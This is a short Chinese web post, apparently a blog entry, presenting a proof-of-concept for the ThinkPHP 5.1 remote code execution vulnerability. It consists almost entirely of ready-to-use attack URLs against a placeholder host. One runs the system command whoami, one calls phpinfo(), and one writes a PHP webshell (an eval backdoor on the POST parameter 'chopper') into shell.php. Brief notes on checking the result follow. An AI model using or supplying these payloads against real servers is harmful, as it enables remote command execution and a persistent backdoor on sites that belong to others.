ThinPHP 5.1代码执行漏洞POC
https://www.xxxx.cn/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami
执行phpinfo()函数:
https://www.xxxx.cn/public/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1
写入webshell:
https://www.xxxx.cn/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=shell.php&vars[1][]=%3c%3fphp+%40eval(%24_POST%5b%27chopper%27%5d)%3b%3f%3e
上传之后会有一个回显
上传完成之后
测试是否报错
参考:https://blog.csdn.net/qq_36711453/article/details/84977739
网友评论